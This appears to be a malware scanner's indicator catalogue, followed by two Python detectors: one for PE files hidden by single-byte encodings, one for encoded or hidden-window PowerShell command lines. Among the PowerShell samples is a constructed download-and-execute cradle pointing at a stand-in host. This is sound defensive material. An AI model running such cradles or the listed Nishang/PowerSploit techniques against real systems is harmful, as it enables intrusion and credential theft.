BH12113 | Accesses memory in an unusual way. | |
BH12167 | Changes the priority of a process. | |
BH12186 | Contains compiled Lua script bytecode. | |
BH12187 | Calls a procedure in a dynamic link library or code resource at a specific memory address, commonly used to execute Windows APIs. | |
BH12197 | Creates a fork bomb. | |
BH12199 | Creates a new process which executes a shell. | |
BH12203 | Creates a service. | |
BH12204 | Creates a service using WMI. | |
BH12207 | Creates and interacts with additional .NET objects. | |
BH12208 | Creates and interacts with additional COM objects. | |
BH12214 | Creates a process. | |
BH12215 | Creates a new process using WMI. | |
BH12220 | Delays execution. | |
BH12317 | Elevates current user privileges. | |
BH12320 | Evaluates an expression. | |
BH12321 | Evaluates code dynamically. | |
BH12322 | Evaluates PHP code dynamically. | |
BH12324 | Executes a file and pauses script execution until the execution is finished. | |
BH12325 | Executes a file with a hidden window. | |
BH12328 | Executes an expression. | |
BH12329 | Executes another application. | |
BH12330 | Executes another batch file. | |
BH12332 | Executes code using cmstp. | |
BH12333 | Executes code within a trusted execution enclave. | |
BH12334 | Executes commands as another user. | |
BH12336 | Executes commands in a new PowerShell module. | |
BH12337 | Executes commands in another application. | |
BH12338 | Executes commands in command line. | |
BH12339 | Executes commands inside Windows Store app container. | |
BH12340 | Executes commands on a local or remote computer. | |
BH12341 | Executes commands through DDE. | |
BH12342 | Executes commands using superuser rights. | |
BH12343 | Executes DiskPart scripts. | |
BH12344 | Executes Operation Validation Framework tests for a PowerShell module. | |
BH12345 | Executes Pester tests for Windows PowerShell. | |
BH12347 | Executes scripts stored in an Alternate Data Stream (ADS). | |
BH12348 | Executes scripts using cscript tool. | |
BH12349 | Executes scripts using Shared Worker API. | |
BH12352 | Executes Troubleshooting Packs. | |
BH12353 | Executes additional DLL modules, or calls exported functions. | |
BH12368 | Imports credentials management APIs from the Windows API. | |
BH12372 | Imports process creation APIs from the Windows API. | |
BH12373 | Imports registry management APIs from the Windows API. | |
BH12385 | Installs an assembly. | |
BH12391 | Installs system drivers. | |
BH12392 | Interacts with Microsoft .NET Framework code, types and assemblies. | |
BH12393 | Invokes commands obfuscated by format string permutations. | |
BH12395 | Kills processes. | |
BH12397 | Launches an application. | |
BH12406 | Loads additional libraries. | |
BH12459 | Opens a dynamic data exchange (DDE) channel to an external application. | |
BH12463 | Controls a service. | |
BH12480 | Removes a service using WMI. | |
BH12481 | Removes a service. | |
BH12482 | Removes a system driver using WMI. | |
BH12499 | Requests information from an external application through dynamic data exchange (DDE). | |
BH12542 | Runs a macro at a specified time. | |
BH12543 | Runs a macro on a window switch. | |
BH12544 | Runs a macro when a particular key or key combination is pressed. | |
BH12545 | Runs a macro when a sheet is activated from another sheet. | |
BH12546 | Runs a macro when a sheet is updated. | |
BH12547 | Runs a macro when a specific cell, an object or an item is double-clicked. | |
BH12548 | Runs a macro when data is entered into a cell. | |
BH12549 | Runs a macro when an external application sends data via dynamic data exchange (DDE). | |
BH12550 | Runs an external program and pauses script execution until the program is finished. | |
BH12551 | Runs an external program under the context of a different user and pauses script execution until the program is finished. | |
BH12552 | Runs an external program under the context of a different user. | |
BH12554 | Schedules a task on a remote computer. | |
BH12556 | Sends keystrokes to an external application using dynamic data exchange (DDE). | |
BH12557 | Sends keystrokes to an external application. | |
BH12564 | Sets the command line that will run when a transfer job finishes transferring data or enters a specified state. | |
BH12566 | Shuts down or reboots the system. | |
BH12567 | Shuts down or restarts local or remote computers. | |
BH12568 | Shuts down or reboots a system. | |
BH12569 | Shuts down or restarts the specified Remote Desktop Session Host server. | |
BH12571 | Starts a PowerShell session and executes Base64-encoded commands. | |
BH12572 | Starts a PowerShell session and executes specified commands from a file. | |
BH12573 | Starts a PowerShell session and executes specified commands. | |
BH12576 | Starts a PowerShell session. | |
BH12579 | Starts Command Prompt. | |
BH12580 | Starts new PowerShell Workflow Session. | |
BH12581 | Starts Registry Editor. | |
BH12582 | Starts Remote Desktop Connection. | |
BH12583 | Starts Task Scheduler. | |
BH12584 | Enables a scheduled task. | |
BH12585 | Starts the remote control of another Remote Desktop Services session. | |
BH12588 | Stops running processes. | |
BH12595 | Tampers with App Background Tasks. | |
BH12634 | Tampers with driver signing. | |
BH12639 | Tampers with executable file startup parameters. | |
BH12640 | Tampers with execution environment. | |
BH12678 | Tampers with module search locations. | |
BH12692 | Tampers with network print jobs. | |
BH12744 | Tampers with system shutdown. | |
BH12776 | Tampers with Windows PowerShell Desired State Configuration (DSC). | |
BH12791 | Terminates a process on a specified Remote Desktop Session Host server. | |
BH12792 | Terminates a process using WMI. | |
BH12793 | Terminates a process. | |
BH12794 | Terminates a process/thread. | |
BH12795 | Terminates a service using WMI. | |
BH12796 | Terminates browser processes. | |
BH12801 | Uses a Lua script interpreter. | |
BH12802 | Uses a Perl script interpreter. | |
BH12803 | Uses a Python script interpreter. | |
BH12804 | Uses a Ruby script interpreter. | |
BH12812 | Uses Dynamic Data Exchange (DDE) to communicate with an external application. | |
BH12815 | Uses the V8 JavaScript script interpreter (or a related framework). | |
BH12817 | Uses Windows Management Instrumentation to access the system. | |
BH12818 | Uses Windows Management Instrumentation to create a process. | |
BH12824 | Starts a service. | |
BH12828 | Loads the advapi32.dll dynamic link library. | |
BH12829 | Loads the bcrypt.dll dynamic link library. | |
BH12830 | Loads the dbghelp.dll dynamic link library. | |
BH12831 | Loads the kernel32.dll dynamic link library. | |
BH12832 | Loads the msvcrt.dll dynamic link library. | |
BH12833 | Loads the ntdll.dll dynamic link library. | |
BH12834 | Loads the ole32.dll dynamic link library. | |
BH12835 | Loads the oleaut32.dll dynamic link library. | |
BH12836 | Loads the shell32.dll dynamic link library. | |
BH12837 | Loads the urlmon.dll dynamic link library. | |
BH12838 | Contains reference to advapi32.dll which is Advanced Windows 32 Base API. | |
BH12839 | Contains reference to advapi32res.dll which is Advanced Windows 32 Base API. | |
BH12840 | Contains reference to bcrypt.dll which is Windows Cryptographic Primitives Library (Wow64). | |
BH12841 | Contains reference to dbghelp.dll which is Windows Image Helper. | |
BH12842 | Contains reference to kernel32.dll which is Windows NT BASE API Client DLL. | |
BH12843 | Contains reference to msvcrt.dll which is Windows NT CRT DLL. | |
BH12844 | Contains reference to ntdll.dll which is NT Layer DLL. | |
BH12845 | Contains reference to ole32.dll which is Microsoft OLE for Windows. | |
BH12846 | Contains reference to shell32.dll which is Windows Shell Common Dll. | |
BH12847 | Contains reference to urlmon.dll which is OLE32 Extensions for Win32. | |
BH12876 | Starts a systemd service. | |
BH12877 | Stops a systemd service. | |
BH12883 | Preloads a library using LD_PRELOAD. | |
BH12905 | Makes changes to the GUID partition table. | |
BH12906 | Makes changes to the disk partition table. | |
BH12907 | Creates a filesystem. | |
BH12915 | Sends a dbus message. | |
BH12918 | Calls an sd-bus method. | |
BH12919 | Emits an sd-bus signal. | |
BH12923 | Creates an initial ramdisk environment. | |
BH12930 | Inserts a kernel module. | |
BH12931 | Sends a kill signal to a systemd unit. | |
BH12932 | Isolates a systemd unit. | |
BH12933 | Freezes a systemd unit. | |
BH12934 | Edits a systemd unit. | |
BH12935 | Re-enables a systemd unit. | |
BH12936 | Restarts a systemd unit. | |
BH12937 | Reloads a systemd unit. | |
BH12938 | Reloads the systemd manager configuration. | |
BH12939 | Re-executes the systemd manager. | |
BH12946 | Spawns a systemd container. | |
BH12947 | Executes a program in a new namespace. | |
BH12948 | Executes a program in a different namespace. | |
BH12949 | Changes the reported architecture in a new program environment, or sets personality flags. | |
BH12954 | Executes a process inside a network namespace. | |
BH12957 | Traces system calls and signals. | |
BH12958 | Traces library calls. | |
BH12959 | Controls the kernel's audit system. | |
BH12962 | Attaches to a running Docker container. | |
BH12963 | Builds a Docker image from a Dockerfile. | |
BH12964 | Generates a new Docker image from a container's changes. | |
BH12966 | Creates a new Docker container. | |
BH12968 | Runs a command in a running Docker container. | |
BH12969 | Streams the contents of a Docker container as a tar archive. | |
BH12970 | Creates a new filesystem image from the contents of a Docker tarball. | |
BH12971 | Kills a running Docker container. | |
BH12972 | Loads an image from a Docker tar archive. | |
BH12973 | Restarts a Docker container. | |
BH12974 | Removes one or more Docker containers. | |
BH12975 | Removes one or more Docker images. | |
BH12976 | Runs a command in a new Docker container. | |
BH12977 | Starts a Docker container. | |
BH12978 | Stops a Docker container. | |
BH13010 | Adds a path to the DLL search path. | |
BH13025 | Starts an OpenRC service. | |
BH13026 | Stops an OpenRC service. | |
BH13027 | Restarts an OpenRC service. | |
BH13028 | Runs an OpenRC service command. | |
BH13031 | Starts a runit service. | |
BH13032 | Stops a runit service. | |
BH13033 | Sends a signal to a runit service. | |
BH13034 | Restarts a runit service. | |
BH13039 | Executes a command as a different group ID. | |
BH13047 | Executes a process inside a namespace sandbox. | |
BH13049 | Executes an ACPI call using the /proc/acpi/call pseudo-file. | |
BH13070 | Creates a Linux container. | |
BH13071 | Attaches to a Linux Container. | |
BH13072 | Destroys a Linux Container. | |
BH13073 | Executes a command in a Linux Container. | |
BH13074 | Stops a Linux Container. | |
BH13075 | Freezes a Linux Container. | |
BH13077 | Starts, stops or kills auto-started Linux Containers. | |
BH13078 | Manages LXD instance and server configuration options. | |
BH13079 | Deletes LXD instances and snapshots. | |
BH13080 | Executes commands in LXD instances. | |
BH13081 | Manages files in LXD instances. | |
BH13082 | Manages LXD images. | |
BH13083 | Creates and starts LXD instances from images. | |
BH13086 | Lists, shows or deletes background LXD operations. | |
BH13089 | Restarts LXD instances. | |
BH13090 | Starts an LXD instance. | |
BH13091 | Stops an LXD instance. | |
BH13093 | Runs a command or interactive shell with a special root directory. | |
BH13095 | Starts an Ethereum cryptocurrency miner. | |
BH13096 | Starts a Monero cryptocurrency miner. | |
BH13097 | Links an object file. | |
BH13098 | Compiles a C program. | |
BH13099 | Compiles a C++ program. | |
BH13100 | Compiles an Assembly program. | |
BH13101 | Builds a Go package. | |
BH13102 | Runs a Go package. | |
BH13103 | Gets a Go package. | |
BH13104 | Compiles a Rust package. | |
BH13105 | Compiles a Java package. | |
BH13106 | Compiles a Haskell package. | |
BH13107 | Compiles a Maven package. | |
BH13108 | Compiles a Gradle package. | |
BH13109 | Runs a Gradle package. | |
BH13126 | Uses the java.lang.reflect.Method.invoke method, which is used to call methods using reflection. | |
BH13127 | Uses the java.lang.reflect.Constructor.newInstance method, which is used to construct new objects using reflection. | |
BH13130 | Loads an interpreter for dynamic code evaluation. | |
BH13131 | Loads an interpreter for dynamic code evaluation using reflection. | |
BH13132 | Uses a JavaScript script interpreter. | |
BH13133 | Uses a PHP script interpreter. | |
BH13134 | Evaluates code dynamically using reflection. | |
BH13135 | Evaluates JavaScript code dynamically. | |
BH13136 | Evaluates Python code dynamically. | |
BH13137 | Evaluates Ruby code dynamically. | |
BH13138 | Terminates a process using reflection. | |
BH13139 | Creates a process using reflection. | |
BH13140 | Terminates the currently running Java Virtual Machine. | |
BH13141 | Terminates the currently running Java Virtual Machine using reflection. | |
BH13142 | Loads additional libraries using reflection. | |
BH13143 | Terminates a thread using reflection. | |
BH13145 | Calls a JavaScript method. | |
BH13146 | Calls a JavaScript method using reflection. | |
BH13147 | Evaluates JavaScript code dynamically using reflection. | |
BH13148 | Executes Excel4 macros from VBA macros. | |
BH13159 | Terminates all threads in a thread group. | |
BH13165 | Creates a new Node.js process. | |
BH13166 | Registers a new bus on the system. | |
BH13167 | Unregisters a bus from the system. | |
BH13168 | Adds a device to the system device hierarchy. | |
BH13169 | Removes a device from the system device hierarchy. | |
BH13170 | Creates a new device and registers it on the system. | |
BH13171 | Registers a device on the system. | |
BH13172 | Unregisters a device from the system. | |
BH13175 | Attaches a device to a driver. | |
BH13176 | Attaches a driver to a device. | |
BH13177 | Registers a device driver on the system. | |
BH13178 | Unregisters a device driver from the system. | |
BH13181 | Adds a platform device to the system device hierarchy. | |
BH13182 | Removes a platform device from the system device hierarchy. | |
BH13183 | Creates a new platform device. | |
BH13184 | Registers a platform device on the system. | |
BH13185 | Unregisters a platform device from the system. | |
BH13186 | Registers a platform device driver on the system. | |
BH13187 | Unregisters a platform device driver from the system. | |
BH13188 | Registers a root device on the system. | |
BH13189 | Unregisters a root device from the system. | |
BH13190 | Registers a subsystem at /sys/devices/system/. | |
BH13191 | Registers a subsystem at /sys/devices/virtual/. | |
BH13192 | Manages a set of tracked git repositories. | |
BH13193 | Manages git repository branches. | |
BH13195 | Uses Linux kernel APIs for PCI device management. | |
BH13196 | Uses Linux kernel APIs for block device management. | |
BH13197 | Uses Linux kernel APIs for character device management. | |
BH13198 | Uses Linux kernel APIs for miscellaneous device management. | |
BH13199 | Uses Linux kernel APIs for sound device management. | |
BH13200 | Uses Linux kernel APIs for video device management. | |
BH13201 | Uses Linux kernel APIs for digital TV (DVB) device management. | |
BH13202 | Uses Linux kernel APIs for remote controller device management. | |
BH13203 | Uses Linux kernel APIs for media controller device management. | |
BH13204 | Uses Linux kernel APIs for fusion message device management. | |
BH13205 | Uses Linux kernel APIs for intelligent input/output (I2O) device management. | |
BH13206 | Uses Linux kernel APIs for parallel port device management. | |
BH13207 | Uses Linux kernel APIs for inter-integrated circuit (I2C) device management. | |
BH13208 | Uses Linux kernel APIs for input device management. | |
BH13209 | Uses Linux kernel APIs for management of voltage and current regulators. | |
BH13210 | Uses Linux kernel APIs for industrial input/output device management. | |
BH13211 | Uses Linux kernel APIs for FireWire (IEEE 1394) device management. | |
BH13212 | Uses Linux kernel APIs for general purpose input/output device management. | |
BH13213 | Uses Linux kernel APIs for frame buffer device management. | |
BH13214 | Uses Linux kernel APIs for serial peripheral interface (SPI) device management. | |
BH13215 | Uses Linux kernel APIs for improved inter-integrated circuit (I3C) device management. | |
BH13216 | Uses Linux kernel APIs for small computer system interface (SCSI) device management. | |
BH13217 | Uses Linux kernel APIs for USB device management. | |
BH13218 | Uses Linux kernel APIs for USB Type-C device management. | |
BH13246 | Runs precompiled JavaScript code within V8 Virtual Machine context. | |
BH13252 | Creates pipes for interprocess communication. | |
BH13254 | Invokes system calls. | |
BH13255 | Terminates the current running process. | |
BH13256 | Loads code from a JavaScript source file. | |
BH13257 | Installs and loads JavaScript module from the npm repository. | |
BH13258 | Translates JavaScript code to Python code. | |
BH13261 | Loads a WScript.Shell object that can be used to run programs in a new process. | |
BH13274 | Creates a new process which executes a curl command. | |
BH13275 | Creates a new process which executes a wget command. | |
BH13283 | Creates a system thread that executes in kernel mode. | |
BH13289 | Translates an address from a dynamically loaded shared library to its symbol name. | |
BH13291 | Executes a Java application. | |
BH13303 | Creates a new process which executes a whoami command. | |
BH13304 | Creates a new process which executes a hostname command. | |
BH13305 | Creates a new process which executes a nslookup command. | |
BH15155 | Decrypts a file. | |
BH15159 | Contains ROL encrypted PE file. | |
BH15160 | Contains single-byte ADD encrypted PE file. | |
BH15161 | Contains single-byte key-decrement ADD encrypted PE file. | |
BH15162 | Contains single-byte key-decrement XOR encrypted PE file. | |
BH15163 | Contains single-byte key-increment ADD encrypted PE file. | |
BH15164 | Contains single-byte key-increment XOR encrypted PE file. | |
BH15165 | Contains single-byte XOR encrypted PE file. | |
BH15166 | Contains crush compressed PE file. | |
BH15167 | Contains embedded PE file written in reverse. | |
BH15168 | Contains fastlz compressed PE file. | |
BH15170 | Contains Base32-encoded PE file. | |
BH15171 | Contains Base64-encoded PE file. | |
BH15172 | Contains lzf compressed PE file. | |
BH15173 | Contains lzjb compressed PE file. | |
BH15174 | Contains lzmat compressed PE file. | |
BH15175 | Contains lzo2a compressed PE file. | |
BH15176 | Contains slz compressed PE file. | |
BH15177 | Contains ucl compressed PE file. | |
BH15178 | Contains yappy compressed PE file. | |
BH15181 | Contains brieflz compressed PE file. | |
BH15234 | Decrypts data using the Windows Data Protection API. | |
BH16159 | Downloads or installs modules from remote repositories. | |
BH16176 | Sends data to an external application through dynamic data exchange (DDE). | |
BH18243 | Sets SELinux enforcement policy. | |
BH19463 | Prints or controls the kernel ring buffer. | |
BH19464 | Queries the systemd journal. | |
BH20107 | Uses a Nishang command to check for credentials on remote computers and open a PowerShell session if the credentials work. | |
BH20122 | Uses a Nishang command to download an executable in text format, convert it back to an executable and execute it. | |
BH20123 | Uses a Nishang command to download and execute a PowerShell script. | |
BH20124 | Uses a Nishang command to drop and execute executables on multiple computers. | |
BH20128 | Uses a Nishang command to duplicate the access token of lsass.exe and set it in the current process thread. | |
BH20129 | Uses a Nishang command to encode a string to a Base64 string. | |
BH20132 | Uses a Nishang command to execute a script at a given time. | |
BH20133 | Uses a Nishang command to execute commands and scripts from specially crafted Wireless Network Names. | |
BH20134 | Uses a Nishang command to execute commands remotely on a MS SQL server. | |
BH20135 | Uses a Nishang command to execute shellcode from DNS TXT queries. | |
BH20138 | Uses a Nishang command to extract LSA Secrets from the local computer. | |
BH20168 | Uses PowerSploit/Empire command to build an immediate scheduled task to run through a specified Group Policy Object. | |
BH20175 | Uses PowerSploit/Empire command to convert a security identifier (SID) to a group/user name. | |
BH20208 | Uses PowerSploit/Empire command to execute a PowerShell ScriptBlock on a target computer and return its formatted output using WMI as a C2 channel. | |
BH20210 | Uses PowerSploit/Empire command to execute commands on a remote server using MSBuild. | |
BH20211 | Uses PowerSploit/Empire command to execute commands on a remote server using PsExec. | |
BH20212 | Uses PowerSploit/Empire command to execute commands over SSH. | |
BH20320 | Uses PowerSploit/Empire commands via various DCOM methods. | |
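The indicators BH15159 through BH15165 above (ROL, single-byte ADD/XOR, and their key-increment and key-decrement variants) all describe a PE image hidden under a byte-wise transform. The scanner's own detection logic is not on this page; the block below is an added example of how such an indicator can be implemented in Python. It solves each candidate key from the expected `MZ` byte instead of trying all 256 keys per offset, then confirms the `Z`, a sane `e_lfanew`, and the `PE\0\0` signature before reporting. The scheme names, helper functions and the minimal PE-shaped sample blob are constructed for this example and are not real malware or the page's identifiers.

```python
"""Brute-force detector for a PE image hidden with a single-byte transform:
constant XOR/ADD, key-increment and key-decrement XOR/ADD, and ROL.
This is an added example, not the scanner's own logic; the sample blob is
constructed here and is not a real executable."""
import struct

MZ = b"MZ"
PE_SIG = b"PE\x00\x00"
E_LFANEW_OFF = 0x3C          # offset of the e_lfanew field in the DOS header
HEAD_LEN = E_LFANEW_OFF + 4  # bytes needed to read MZ and e_lfanew
MAX_E_LFANEW = 0x400         # sane upper bound for where the PE header sits


def _rol8(b, n):
    return ((b << n) | (b >> (8 - n))) & 0xFF


def _ror8(b, n):
    return ((b >> n) | (b << (8 - n))) & 0xFF


# How a dropper hides the PE (p = plaintext byte, i = index inside the PE).
ENCODERS = {
    "xor":     lambda p, i, k: p ^ k,
    "xor_inc": lambda p, i, k: p ^ ((k + i) & 0xFF),
    "xor_dec": lambda p, i, k: p ^ ((k - i) & 0xFF),
    "add":     lambda p, i, k: (p + k) & 0xFF,
    "add_inc": lambda p, i, k: (p + k + i) & 0xFF,
    "add_dec": lambda p, i, k: (p + k - i) & 0xFF,
    "rol":     lambda p, i, k: _rol8(p, k),
}

# Exact inverses, used by the scanner (c = ciphertext byte).
DECODERS = {
    "xor":     lambda c, i, k: c ^ k,
    "xor_inc": lambda c, i, k: c ^ ((k + i) & 0xFF),
    "xor_dec": lambda c, i, k: c ^ ((k - i) & 0xFF),
    "add":     lambda c, i, k: (c - k) & 0xFF,
    "add_inc": lambda c, i, k: (c - k - i) & 0xFF,
    "add_dec": lambda c, i, k: (c - k + i) & 0xFF,
    "rol":     lambda c, i, k: _ror8(c, k),
}


def encode(data, scheme, key):
    f = ENCODERS[scheme]
    return bytes(f(b, i, key) for i, b in enumerate(data))


def _decode(data, start, length, scheme, key):
    f = DECODERS[scheme]
    return bytes(f(data[start + i], i, key) for i in range(length))


def _candidate_keys(scheme, first_byte):
    """Keys under which the first ciphertext byte would decode to 'M'."""
    if scheme.startswith("xor"):
        return [first_byte ^ 0x4D]
    if scheme.startswith("add"):
        return [(first_byte - 0x4D) & 0xFF]
    return [n for n in range(1, 8) if _ror8(first_byte, n) == 0x4D]


def find_encoded_pe(data):
    """Return (scheme, key, offset, e_lfanew) for each hidden PE found.

    Solving the key from the expected 'M' keeps this O(len * schemes)
    instead of 256 trial keys per offset; the 'Z', a sane e_lfanew and the
    PE signature at e_lfanew then reject false candidates."""
    hits = []
    for off in range(len(data) - HEAD_LEN + 1):
        for scheme in DECODERS:
            for key in _candidate_keys(scheme, data[off]):
                head = _decode(data, off, HEAD_LEN, scheme, key)
                if head[:2] != MZ:
                    continue
                e_lfanew = struct.unpack_from("<I", head, E_LFANEW_OFF)[0]
                if not 0x40 <= e_lfanew <= MAX_E_LFANEW:
                    continue
                if off + e_lfanew + 4 > len(data):
                    continue
                sig = _decode(data, off, e_lfanew + 4, scheme, key)[e_lfanew:]
                if sig == PE_SIG:
                    hits.append((scheme, key, off, e_lfanew))
    return hits


def build_sample_pe():
    """Constructed, minimal PE-shaped header: MZ, e_lfanew = 0x40, PE sig."""
    dos = MZ + b"\x00" * (E_LFANEW_OFF - 2) + struct.pack("<I", 0x40)
    return dos + PE_SIG + b"\x00" * 12


SAMPLES = [("xor", 0x5C), ("xor_inc", 0x21), ("xor_dec", 0xF0),
           ("add", 0x33), ("add_inc", 0x7A), ("add_dec", 0x1B), ("rol", 3)]


def build_sample_blob():
    """Zero filler with one encoded copy of the sample PE per scheme.

    Returns the blob and the hits the scanner is expected to report."""
    pe, filler = build_sample_pe(), b"\x00" * 64
    blob, expected = bytearray(filler), []
    for scheme, key in SAMPLES:
        expected.append((scheme, key, len(blob), 0x40))
        blob += encode(pe, scheme, key) + filler
    return bytes(blob), expected


if __name__ == "__main__":
    blob, expected = build_sample_blob()
    for hit in find_encoded_pe(blob):
        print("found PE: scheme=%s key=0x%02X offset=%d" % hit[:3])
```

A plain, unencoded PE is reported twice (as `xor` and `add` with key 0), which is convenient when the same scanner also has to flag an embedded cleartext PE; callers that want only the encrypted cases can drop key-0 hits. Multi-byte or rolling keys and the reversed-image case (BH15167) need a different search and are not covered here.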
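Indicator BH12571 (a PowerShell session executing Base64-encoded commands) and BH12325 (a file executed with a hidden window) are usually observed together on one process command line. As an added example, not the scanner's own rule, the Python below recognises the `-EncodedCommand` switch in the abbreviated forms powershell.exe accepts (`-e`, `-ec`, `-enc`, ...), decodes the UTF-16LE payload back to script text, and flags `-WindowStyle Hidden`. The command lines, the download-cradle text and the `example.invalid` host are constructed for the example.

```python
"""Flag PowerShell command lines that carry a Base64 (-EncodedCommand)
payload or a hidden window, and recover the script text.
Added example, not part of the page; the command lines below are constructed."""
import base64
import shlex


def encode_command(script):
    """What the attacker does: UTF-16LE, then Base64, for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of encode_command; None if the payload is not UTF-16LE text."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _is_encoded_param(tok):
    # powershell.exe maps -e and -ec explicitly; any longer prefix of
    # -EncodedCommand starting with "en" also works (-ex is -ExecutionPolicy).
    t = tok.lstrip("-/").lower()
    return t in ("e", "ec") or (len(t) >= 2 and "encodedcommand".startswith(t))


def _is_window_param(tok):
    t = tok.lstrip("-/").lower()
    return t == "w" or (len(t) >= 2 and "windowstyle".startswith(t))


def analyse_powershell_cmdline(cmdline):
    """Return {'encoded', 'hidden_window', 'script'} for one command line."""
    tokens = shlex.split(cmdline, posix=False)  # keep backslashes and quotes
    result = {"encoded": False, "hidden_window": False, "script": None}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok.startswith(("-", "/")) and nxt is not None:
            if _is_encoded_param(tok):
                result["encoded"] = True
                result["script"] = decode_encoded_command(nxt)
                i += 2
                continue
            if _is_window_param(tok) and nxt.lower() == "hidden":
                result["hidden_window"] = True
                i += 2
                continue
        i += 1
    return result


def scan(cmdlines):
    """Return the analysis of every command line that trips either indicator."""
    results = [analyse_powershell_cmdline(c) for c in cmdlines]
    return [r for r in results if r["encoded"] or r["hidden_window"]]


# Constructed samples: a hidden-window encoded download cradle, a benign
# interactive invocation, and an encoded command using the short -E form.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_command(CRADLE),
    "powershell -NoProfile -ExecutionPolicy Bypass -Command Get-Process",
    "powershell.exe -ex bypass -E " + encode_command("Start-Sleep 5"),
]


if __name__ == "__main__":
    for r in scan(SAMPLE_CMDLINES):
        print(r)
```

Decoding the payload matters more than flagging the switch: the recovered script is what the other indicators on this page (for example BH13274 for a curl download, or the Nishang and PowerSploit entries) should be matched against. Command lines that pass the encoded payload through a variable or a nested `cmd /c` are not unwrapped here.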